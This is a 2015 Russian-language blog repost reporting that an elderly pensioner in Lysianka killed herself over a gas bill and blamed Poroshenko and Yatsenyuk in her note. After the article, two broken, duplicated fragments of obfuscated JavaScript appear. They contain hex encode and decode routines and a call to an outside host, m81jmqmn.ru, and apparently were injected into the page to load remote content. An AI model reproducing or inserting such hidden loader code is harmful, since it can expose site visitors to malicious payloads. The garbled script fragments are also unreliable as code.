ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

«В моей смерти винить Порошенко и Яценюка». Пенсионерка повесилась из-за счетов за газ

Posted by operkor на Ноябрь 17, 2015

2На Черкасщине 80-летняя одинокая пенсионерка решила покончить с собой после того, как получила платежку за газ. Об этом сообщает местный журналист Владимир Чос на своей странице в Facebook. По словам журналиста, трагедия произошла в поселке Лысянка. В предсмертной записке бабушка обвинила в своей смерти Петра Порошенко и Арсения Яценюка.

«В пгт. Лысянка повесилась восьмидесятилетняя бабушка. Жила одиноко (сын где-то в России). В предсмертной записке написала: «В моей смерти винить Порошенко и Яценюка» и прикрепила счет за газ на четыре тысячи», – сказано в сообщении.

«Газовики дали такие счета, хотя у нее обязательная сумма сто с лишним гривен», – уточнил Владимир. В пресс-службе главного управления Национальной полиции в Черкасской области информацию о суициде подтвердили.

По закону, полиция обязана возбудить уголовное производство по статье «доведение до самоубийства»

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: